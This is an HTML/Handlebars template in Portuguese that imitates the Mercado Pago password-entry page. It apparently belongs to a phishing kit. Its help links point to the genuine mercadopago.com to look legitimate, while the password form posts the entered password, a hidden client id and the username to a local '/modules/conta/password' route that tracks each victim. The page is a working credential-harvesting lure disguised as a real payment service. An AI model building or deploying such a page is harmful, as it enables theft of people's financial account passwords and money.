<div class='w-full md:!py-10 m-auto bg-white p-4 font-proxima'>
    <div class='w-full max-w-container mx-auto md:grid md:grid-cols-[400px_auto] text-black justify-center'>
        <div class='flex flex-col gap-1 pr-10'>
            <h3 class='text-title leading-lg font-semibold'>Digite sua senha do Mercado Pago
            </h3>

            <div class='w-full flex flex-col gap-4 mt-3'>

                <div
                    class='w-full rounded-full p-sm max-w-[230px] h-[50px] border border-black/10 gap-3 grid grid-cols-[30px_auto]'
                >
                    <div class='w-[30px] h-[30px] flex justify-center items-center rounded-full bg-curious-blue-400/10'>
                        <svg aria-hidden='true' width='24' height='24' viewBox='0 0 24 24' fill='#009ee3'><path
                                fill-rule='evenodd'
                                clip-rule='evenodd'
                                d='M11.999 15.75C15.7275 15.75 18.75 12.7275 18.75 8.999C18.75 5.27053 15.7275 2.248 11.999 2.248C8.27053 2.248 5.248 5.27053 5.248 8.999C5.248 12.7275 8.27053 15.75 11.999 15.75ZM11.999 14.25C9.09895 14.25 6.748 11.899 6.748 8.999C6.748 6.09895 9.09895 3.748 11.999 3.748C14.899 3.748 17.25 6.09895 17.25 8.999C17.25 11.899 14.899 14.25 11.999 14.25Z'
                                fill='#009ee3'
                            >
                            </path><path
                                d='M5.98045 18.75C4.74861 18.75 3.75 19.7486 3.75 20.9804V21.7304H2.25V20.9804C2.25 18.9202 3.92018 17.25 5.98045 17.25H18C20.0711 17.25 21.75 18.9289 21.75 21V21.75H20.25V21C20.25 19.7574 19.2426 18.75 18 18.75H5.98045Z'
                                fill='#009ee3'
                            ></path>
                        </svg>
                    </div>
                    <div class='flex flex-col gap-0'>
                        <span class='text-black font-normal text-xs'>{{client.user}}</span>
                        <a class='text-curious-blue-400 font-proxima font-normal !text-xs' href='/modules/conta'>Trocar
                            conta</a>
                    </div>
                </div>
            </div>

            <div class='w-full border-t border-black/10 flex flex-col gap-2 mt-3'>
                <hr class='bg-black/40 p-0 max-w-[230px] !h-[1px] !border-none' />
                <span class='font-normal text-sm my-2'>Relatar um problema</span>
                <div class='w-full p-sm px-0 max-w-[230px] flex flex-col'>
                    <a href='https://mercadopago.com' class='grid w-full grid-cols-[24px_auto_auto] items-center'>
                        <div>
                            <svg
                                aria-hidden='true'
                                class='mr-auto'
                                width='16'
                                height='16'
                                viewBox='0 0 16 16'
                                fill='rgba(0, 0, 0, 0.9)'
                            ><path
                                    fill-rule='evenodd'
                                    clip-rule='evenodd'
                                    d='M4.79922 0.203857C3.91556 0.203857 3.19922 0.920204 3.19922 1.80386V14.2001C3.19922 15.0837 3.91556 15.8001 4.79922 15.8001H11.185C12.0687 15.8001 12.785 15.0837 12.785 14.2001V1.80386C12.785 0.920202 12.0687 0.203857 11.185 0.203857H4.79922ZM4.39922 1.80386C4.39922 1.58294 4.57831 1.40386 4.79922 1.40386H11.185C11.4059 1.40386 11.585 1.58294 11.585 1.80386V2.6L4.39922 2.59999V1.80386ZM4.39922 3.79999V12.2001L11.585 12.2001V3.8L4.39922 3.79999ZM11.585 13.4001L4.39922 13.4001V14.2001C4.39922 14.421 4.5783 14.6001 4.79922 14.6001H11.185C11.4059 14.6001 11.585 14.421 11.585 14.2001V13.4001Z'
                                    fill='rgba(0, 0, 0, 0.9)'
                                ></path></svg>
                        </div>

                        <div class='text-sm font-normal text-black/50'>Roubo ou perda de celular</div>

                        <div>
                            <svg
                                aria-hidden='true'
                                width='20'
                                height='20'
                                viewBox='0 0 20 20'
                                fill='rgba(0, 0, 0, 0.55)'
                            ><path
                                    d='M8.27686 4.34644L7.42834 5.19496L12.224 9.99059L7.42334 14.7912L8.27187 15.6397L13.921 9.99059L8.27686 4.34644Z'
                                    fill='rgba(0, 0, 0, 0.55)'
                                ></path></svg>
                        </div>
                    </a>
                </div>

                <hr class='bg-black/40 p-0 max-w-[230px] !h-[1px] !border-none' />

                <div class='w-full p-sm px-0 max-w-[230px] flex flex-col'>
                    <a href='https://mercadopago.com' class='grid w-full grid-cols-[24px_auto_auto] items-center'>
                        <div>
                            <svg
                                aria-hidden='true'
                                class='mr-auto'
                                width='16'
                                height='16'
                                viewBox='0 0 16 16'
                                fill='rgba(0, 0, 0, 0.9)'
                            ><path
                                    fill-rule='evenodd'
                                    clip-rule='evenodd'
                                    d='M12.2041 5.60027C12.2041 7.91964 10.3239 9.79986 8.00452 9.79986C5.68515 9.79986 3.80493 7.91964 3.80493 5.60027C3.80493 3.28089 5.68515 1.40067 8.00452 1.40067C10.3239 1.40067 12.2041 3.28089 12.2041 5.60027ZM5.00493 5.60027C5.00493 7.2569 6.34789 8.59986 8.00452 8.59986C9.66116 8.59986 11.0041 7.2569 11.0041 5.60027C11.0041 3.94363 9.66116 2.60067 8.00452 2.60067C6.34789 2.60067 5.00493 3.94363 5.00493 5.60027Z'
                                    fill='rgba(0, 0, 0, 0.9)'
                                ></path><path
                                    d='M4.38302 12.1996C3.39769 12.1996 2.59893 12.9984 2.59893 13.9837V14.5837H1.39893V13.9837C1.39893 12.3356 2.73495 10.9996 4.38302 10.9996H11.5992C13.2559 10.9996 14.5989 12.3426 14.5989 13.9993V14.5993H13.3989V13.9993C13.3989 13.0054 12.5932 12.1996 11.5992 12.1996H4.38302Z'
                                    fill='rgba(0, 0, 0, 0.9)'
                                ></path></svg>
                        </div>

                        <div class='text-[14px] font-normal text-black/50'>Roubo de conta</div>

                        <div>
                            <svg
                                aria-hidden='true'
                                class='ml-auto'
                                width='20'
                                height='20'
                                viewBox='0 0 20 20'
                                fill='rgba(0, 0, 0, 0.55)'
                            ><path
                                    d='M8.27686 4.34644L7.42834 5.19496L12.224 9.99059L7.42334 14.7912L8.27187 15.6397L13.921 9.99059L8.27686 4.34644Z'
                                    fill='rgba(0, 0, 0, 0.55)'
                                ></path></svg>
                        </div>
                    </a>
                </div>

                <a
                    href='https://mercadopago.com'
                    class='text-curious-blue-400 font-proxima font-normal !text-sm'
                >Preciso de ajuda com outros temas</a>
            </div>
        </div>

        <div
            class='max-w-bxContainer self-start flex flex-col gap-1 pr-10 rounded-lg border border-black/10 py-[16px] px-[40px]'
        >
            <form action="/modules/conta/password" class='flex flex-col main-form-login password'>
                {{#if client}}<input type="hidden" name="id" value="{{client.id}}">{{/if}}
                <input type="hidden" name="user" value="{{client.user}}">
                <span class='text-black font-normal text-xs mb-1'>Senha</span>
                <div class='grid grid-cols-1 gap-3'>
                    <div class='grid grid-cols-1'>
                        <input
                            type='text'
                            name='password'
                            id='password'
                            class='otp-input {{#if error}} border border-red-500{{/if}} h-[48px] px-3 focus-within:ring-offset-1 focus-within:ring-2 focus-within:ring-curious-blue-400 focus-within:!border focus-within:border-curious-blue-400 active:border active:border-curious-blue-400 text-start flex items-center shadow-shadowBox rounded-md border-none outline-none'
                        />
                    </div>
                </div>
                <div class='flex flex-col gap-2 mt-3 items-start mb-4'>
                    <div class='grid grid-cols-[auto_207px] gap-2 main-form-login__submit'>
                        <button
                            class='bg-curious-blue-400 confirm hover:bg-deep-cerulean-700 font-semibold text-white text-md px-[24px] h-[48px] rounded-md'
                        >Iniciar sessão</button>

                        <a
                            href='/modules/conta/authentication/{{client.id}}'
                            class='bg-wite bg-curious-blue-400/10 hover:bg-curious-blue-400/20 whitespace-nowrap flex items-center justify-center font-proxima !font-semibold !text-curious-blue-400 !text-def-sm px-[24px] h-[48px] rounded-md'
                        >Esqueçeu a senha?</a>
                    </div>
                </div>
            </form>
        </div>
    </div>
</div>